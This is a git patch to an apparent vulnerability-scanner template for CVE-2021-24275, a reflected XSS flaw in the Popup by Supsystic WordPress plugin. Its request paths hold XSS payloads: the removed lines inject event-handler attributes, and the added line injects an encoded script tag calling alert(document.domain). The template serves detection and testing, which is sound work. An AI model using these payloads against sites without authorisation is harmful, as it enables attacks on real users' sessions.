From 58e6ee07a94826c8547751bf588809bbe967db0a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 29 Sep 2021 00:22:52 +0530 Subject: [PATCH] Update CVE-2021-24275.yaml --- cves/2021/CVE-2021-24275.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-24275.yaml b/cves/2021/CVE-2021-24275.yaml index 5590f033eb..625ef74197 100644 --- a/cves/2021/CVE-2021-24275.yaml +++ b/cves/2021/CVE-2021-24275.yaml @@ -4,27 +4,27 @@ info: name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK severity: medium + description: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue. reference: - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f - tags: wordpress,cves,cve2021 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24275 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-24275 cwe-id: CWE-79 - description: "The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" + tags: wordpress,cve,cve2021,wp-plugin requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="onmouseover=alert(/XSS/)//' - - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'alert(/XSS/)/' + - '' condition: and - type: status